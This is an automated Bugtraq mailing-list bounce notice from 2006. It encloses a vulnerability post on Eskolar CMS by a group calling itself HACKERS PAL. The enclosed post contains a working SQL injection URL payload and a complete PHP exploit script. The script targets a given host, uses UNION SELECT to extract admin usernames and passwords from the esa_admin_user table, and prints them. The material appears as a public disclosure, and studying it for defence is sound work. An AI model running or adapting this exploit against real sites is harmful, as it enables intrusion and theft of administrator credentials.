Hi! This is the ezmlm program. I'm managing the
bugtraq@xxxxxxxxxxxxxxxxx mailing list.
I'm working for my owner, who can be reached
at bugtraq-owner@xxxxxxxxxxxxxxxxxx
Messages to you from the bugtraq mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.
If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the bugtraq mailing list,
without further notice.
I've kept a list of which messages from the bugtraq mailing list have
bounced from your address.
Copies of these messages may be in the archive.
To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
<bugtraq-get.123_145@xxxxxxxxxxxxxxxxx>
To receive a subject and author list for the last 100 or so messages,
send an empty message to:
<bugtraq-index@xxxxxxxxxxxxxxxxx>
Here are the message numbers:
27863
27868
27869
27861
27862
27864
27870
27865
27866
27877
27867
27878
27871
27880
27879
27881
27872
27874
27876
27873
27875
--- Enclosed is a copy of the bounce message I received.
Return-Path: <>
Received: (qmail 17758 invoked from network); 24 Sep 2006 17:59:56 -0000
Received: from mail.securityfocus.com (205.206.231.9)
by lists2.securityfocus.com with SMTP; 24 Sep 2006 17:59:56 -0000
Received: (qmail 4575 invoked by alias); 24 Sep 2006 18:20:09 -0000
Received: (qmail 1996 invoked from network); 24 Sep 2006 18:18:23 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
by mail.securityfocus.com with SMTP; 24 Sep 2006 18:18:23 -0000
Received: by outgoing3.securityfocus.com (Postfix)
id 400BC23799A; Sun, 24 Sep 2006 11:22:26 -0600 (MDT)
Date: Sun, 24 Sep 2006 11:22:26 -0600 (MDT)
From: MAILER-DAEMON@xxxxxxxxxxxxxxxxx (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="5B85D23705C.1159118531/outgoing3.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20060924172226.400BC23799A@xxxxxxxxxxxxxxxxxxxxxxxxxxx>
This is a MIME-encapsulated message.
--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Notification
Content-Type: text/plain
This is the Postfix program at host outgoing3.securityfocus.com.
I'm sorry to have to inform you that your message could not be
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to <postmaster>
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The Postfix program
<list-bugtraq23@xxxxxxxxxxx>: host mail.spinics.net[66.254.95.226] said: 451
4.1.8 Domain of sender address
bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx does not
resolve (in reply to MAIL FROM command)
--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; outgoing3.securityfocus.com
X-Postfix-Queue-ID: 5B85D23705C
X-Postfix-Sender: rfc822; bugtraq-return-27863@xxxxxxxxxxxxxxxxx
Arrival-Date: Fri, 22 Sep 2006 09:16:39 -0600 (MDT)
Final-Recipient: rfc822; list-bugtraq23@xxxxxxxxxxx
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; host mail.spinics.net[66.254.95.226] said: 451
4.1.8 Domain of sender address
bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx does not
resolve (in reply to MAIL FROM command)
--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5B85D23705C; Fri, 22 Sep 2006 09:16:39 -0600 (MDT)
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Received: (qmail 14880 invoked from network); 22 Sep 2006 06:03:50 -0000
Date: 22 Sep 2006 06:27:12 -0000
Message-ID: <20060922062712.8894.qmail@xxxxxxxxxxxxxxxxx>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: security@xxxxxxxxx
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Eskolar CMS Remote Sql Injection
Hello,,
Eskolar CMS Remote Sql Injection
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx
Remote Sql injection :-
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*
Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* Eskolar CMS Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* Eskolar CMS Remote sql injection exploit */
/* by HACKERS PAL <security@xxxxxxxxx> */
/* site: http://www.soqor.net */');
if ($argc<2) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host
/* Example: */
/* php '.$argv[0].' http://localhost/eskolar/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$url=$argv[1];
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";
$page=$url.$exploit;
Function get_page($url)
{
if(function_exists("file_get_contents"))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
$i=0;
function get($var)
{
GLOBAL $i;
$var[1]=trim($var[1]);
if($i==0)
{
Echo "\n[+] User Name : ".$var[1];
$i++;
}
else
{
Echo "\n[+] Pass Word : ".$var[1];
}
}
$page = get_page($page);
if(!preg_match('/\<tr bgcolor=\'#FF0000\'><td><div align=\'center\'>(.+?)<\/div><\/td><\/tr>/is',$page)||!preg_match('/\<td><a href=\"(.+?)\" target=\"_blank\">(.+?)<\/a> <\/td>/is',$page))
{
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}
preg_replace_callback('/\<tr bgcolor=\'#FF0000\'><td><div align=\'center\'>(.+?)<\/div><\/td><\/tr>/is','get',$page);
preg_replace_callback('/\<td><a href=\"(.+?)\" target=\"_blank\">(.+?)<\/a> <\/td>/is','get',$page);
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
?>
#WwW.SoQoR.NeT
--5B85D23705C.1159118531/outgoing3.securityfocus.com--
